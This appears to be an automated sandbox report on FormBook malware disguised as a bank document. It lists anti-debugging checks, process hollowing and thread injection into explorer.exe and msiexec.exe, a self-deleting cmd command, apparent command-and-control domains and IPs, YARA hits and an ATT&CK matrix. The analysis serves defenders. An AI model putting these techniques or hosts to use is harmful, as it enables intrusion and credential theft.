          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DBA70E mov eax, dword ptr fs:[00000030h]15_2_04DBA70E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E5070D mov eax, dword ptr fs:[00000030h]15_2_04E5070D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E5070D mov eax, dword ptr fs:[00000030h]15_2_04E5070D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DBE730 mov eax, dword ptr fs:[00000030h]15_2_04DBE730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E1FF10 mov eax, dword ptr fs:[00000030h]15_2_04E1FF10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E1FF10 mov eax, dword ptr fs:[00000030h]15_2_04E1FF10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D84F2E mov eax, dword ptr fs:[00000030h]15_2_04D84F2E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D84F2E mov eax, dword ptr fs:[00000030h]15_2_04D84F2E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]15_2_04E1B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E1B8D0 mov ecx, dword ptr fs:[00000030h]15_2_04E1B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]15_2_04E1B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]15_2_04E1B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]15_2_04E1B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]15_2_04E1B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D858EC mov eax, dword ptr fs:[00000030h]15_2_04D858EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D89080 mov eax, dword ptr fs:[00000030h]15_2_04D89080
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DBF0BF mov ecx, dword ptr fs:[00000030h]15_2_04DBF0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DBF0BF mov eax, dword ptr fs:[00000030h]15_2_04DBF0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DBF0BF mov eax, dword ptr fs:[00000030h]15_2_04DBF0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E03884 mov eax, dword ptr fs:[00000030h]15_2_04E03884
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E03884 mov eax, dword ptr fs:[00000030h]15_2_04E03884
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC90AF mov eax, dword ptr fs:[00000030h]15_2_04DC90AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB20A0 mov eax, dword ptr fs:[00000030h]15_2_04DB20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB20A0 mov eax, dword ptr fs:[00000030h]15_2_04DB20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB20A0 mov eax, dword ptr fs:[00000030h]15_2_04DB20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB20A0 mov eax, dword ptr fs:[00000030h]15_2_04DB20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB20A0 mov eax, dword ptr fs:[00000030h]15_2_04DB20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB20A0 mov eax, dword ptr fs:[00000030h]15_2_04DB20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DA0050 mov eax, dword ptr fs:[00000030h]15_2_04DA0050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DA0050 mov eax, dword ptr fs:[00000030h]15_2_04DA0050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E51074 mov eax, dword ptr fs:[00000030h]15_2_04E51074
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E42073 mov eax, dword ptr fs:[00000030h]15_2_04E42073
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E54015 mov eax, dword ptr fs:[00000030h]15_2_04E54015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E54015 mov eax, dword ptr fs:[00000030h]15_2_04E54015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D9B02A mov eax, dword ptr fs:[00000030h]15_2_04D9B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D9B02A mov eax, dword ptr fs:[00000030h]15_2_04D9B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D9B02A mov eax, dword ptr fs:[00000030h]15_2_04D9B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D9B02A mov eax, dword ptr fs:[00000030h]15_2_04D9B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E07016 mov eax, dword ptr fs:[00000030h]15_2_04E07016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E07016 mov eax, dword ptr fs:[00000030h]15_2_04E07016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E07016 mov eax, dword ptr fs:[00000030h]15_2_04E07016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB002D mov eax, dword ptr fs:[00000030h]15_2_04DB002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB002D mov eax, dword ptr fs:[00000030h]15_2_04DB002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB002D mov eax, dword ptr fs:[00000030h]15_2_04DB002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB002D mov eax, dword ptr fs:[00000030h]15_2_04DB002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB002D mov eax, dword ptr fs:[00000030h]15_2_04DB002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E141E8 mov eax, dword ptr fs:[00000030h]15_2_04E141E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]15_2_04D8B1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]15_2_04D8B1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]15_2_04D8B1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E069A6 mov eax, dword ptr fs:[00000030h]15_2_04E069A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB2990 mov eax, dword ptr fs:[00000030h]15_2_04DB2990
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DAC182 mov eax, dword ptr fs:[00000030h]15_2_04DAC182
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DBA185 mov eax, dword ptr fs:[00000030h]15_2_04DBA185
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E051BE mov eax, dword ptr fs:[00000030h]15_2_04E051BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E051BE mov eax, dword ptr fs:[00000030h]15_2_04E051BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E051BE mov eax, dword ptr fs:[00000030h]15_2_04E051BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E051BE mov eax, dword ptr fs:[00000030h]15_2_04E051BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB61A0 mov eax, dword ptr fs:[00000030h]15_2_04DB61A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB61A0 mov eax, dword ptr fs:[00000030h]15_2_04DB61A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DAB944 mov eax, dword ptr fs:[00000030h]15_2_04DAB944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DAB944 mov eax, dword ptr fs:[00000030h]15_2_04DAB944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D8B171 mov eax, dword ptr fs:[00000030h]15_2_04D8B171
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D8B171 mov eax, dword ptr fs:[00000030h]15_2_04D8B171
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D8C962 mov eax, dword ptr fs:[00000030h]15_2_04D8C962
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D89100 mov eax, dword ptr fs:[00000030h]15_2_04D89100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D89100 mov eax, dword ptr fs:[00000030h]15_2_04D89100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D89100 mov eax, dword ptr fs:[00000030h]15_2_04D89100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB513A mov eax, dword ptr fs:[00000030h]15_2_04DB513A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB513A mov eax, dword ptr fs:[00000030h]15_2_04DB513A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DA4120 mov eax, dword ptr fs:[00000030h]15_2_04DA4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DA4120 mov eax, dword ptr fs:[00000030h]15_2_04DA4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DA4120 mov eax, dword ptr fs:[00000030h]15_2_04DA4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DA4120 mov eax, dword ptr fs:[00000030h]15_2_04DA4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DA4120 mov ecx, dword ptr fs:[00000030h]15_2_04DA4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB2ACB mov eax, dword ptr fs:[00000030h]15_2_04DB2ACB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DB2AE4 mov eax, dword ptr fs:[00000030h]15_2_04DB2AE4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DBD294 mov eax, dword ptr fs:[00000030h]15_2_04DBD294
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DBD294 mov eax, dword ptr fs:[00000030h]15_2_04DBD294
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D9AAB0 mov eax, dword ptr fs:[00000030h]15_2_04D9AAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D9AAB0 mov eax, dword ptr fs:[00000030h]15_2_04D9AAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DBFAB0 mov eax, dword ptr fs:[00000030h]15_2_04DBFAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D852A5 mov eax, dword ptr fs:[00000030h]15_2_04D852A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D852A5 mov eax, dword ptr fs:[00000030h]15_2_04D852A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D852A5 mov eax, dword ptr fs:[00000030h]15_2_04D852A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D852A5 mov eax, dword ptr fs:[00000030h]15_2_04D852A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D852A5 mov eax, dword ptr fs:[00000030h]15_2_04D852A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E3B260 mov eax, dword ptr fs:[00000030h]15_2_04E3B260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E3B260 mov eax, dword ptr fs:[00000030h]15_2_04E3B260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E58A62 mov eax, dword ptr fs:[00000030h]15_2_04E58A62
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D89240 mov eax, dword ptr fs:[00000030h]15_2_04D89240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D89240 mov eax, dword ptr fs:[00000030h]15_2_04D89240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D89240 mov eax, dword ptr fs:[00000030h]15_2_04D89240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D89240 mov eax, dword ptr fs:[00000030h]15_2_04D89240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DC927A mov eax, dword ptr fs:[00000030h]15_2_04DC927A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E4EA55 mov eax, dword ptr fs:[00000030h]15_2_04E4EA55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04E14257 mov eax, dword ptr fs:[00000030h]15_2_04E14257
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04DA3A1C mov eax, dword ptr fs:[00000030h]15_2_04DA3A1C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D85210 mov eax, dword ptr fs:[00000030h]15_2_04D85210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D85210 mov ecx, dword ptr fs:[00000030h]15_2_04D85210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D85210 mov eax, dword ptr fs:[00000030h]15_2_04D85210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D85210 mov eax, dword ptr fs:[00000030h]15_2_04D85210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D8AA16 mov eax, dword ptr fs:[00000030h]15_2_04D8AA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D8AA16 mov eax, dword ptr fs:[00000030h]15_2_04D8AA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04D98A0A mov eax, dword ptr fs:[00000030h]15_2_04D98A0A
          Source: C:\Windows\SysWOW64\setup16.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A095D0 NtClose,LdrInitializeThunk,6_2_04A095D0
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.ponponshoes.com
          Source: C:\Windows\explorer.exeDomain query: www.paulstilingroup.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.92 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 171.22.26.13 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.204.236.66 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.253.231 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.wifitest.info
          Source: C:\Windows\explorer.exeDomain query: www.floridasunbreaks.com
          Source: C:\Windows\explorer.exeDomain query: www.rkhubs.com
          Source: C:\Windows\explorer.exeDomain query: www.bathingsuitsshoppingus.com
          Source: C:\Windows\explorer.exeDomain query: www.cthomassolutions.com
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\setup16.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 1030000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\setup16.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\setup16.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\setup16.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\setup16.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\setup16.exeThread register set: target process: 3968Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3968Jump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess created: C:\Windows\SysWOW64\setup16.exe C:\Windows\SysWOW64\setup16.exeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\setup16.exe"Jump to behavior
          Source: explorer.exe, 0000000A.00000000.327569358.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.308770659.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.347846634.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 0000000A.00000000.331958282.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.328046880.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.355824820.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.328046880.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.403137924.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.309259468.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.328046880.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.403137924.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.309259468.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000A.00000000.402896611.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.308782929.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.327608228.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 0000000A.00000000.328046880.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.403137924.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.309259468.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeQueries volume information: C:\Users\user\Desktop\Document de bancobpi_66473474.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.2.setup16.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.setup16.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.338228196.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.299122182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.357277417.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.538727170.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.314192063.0000000003BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.316963754.00000000046E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.369940835.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.369893076.00000000007B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.297403111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.314362271.0000000003C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.298419398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.2.setup16.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.setup16.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.338228196.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.299122182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.357277417.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.538727170.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.314192063.0000000003BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.316963754.00000000046E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.369940835.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.369893076.00000000007B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.297403111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.314362271.0000000003C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.298419398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		512
          Process Injection          		1
          Masquerading          		OS Credential Dumping221
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets112
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Hidden Users          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items3
          Obfuscated Files or Information          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Software Packing          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          Timestomp          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
          DLL Side-Loading          		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
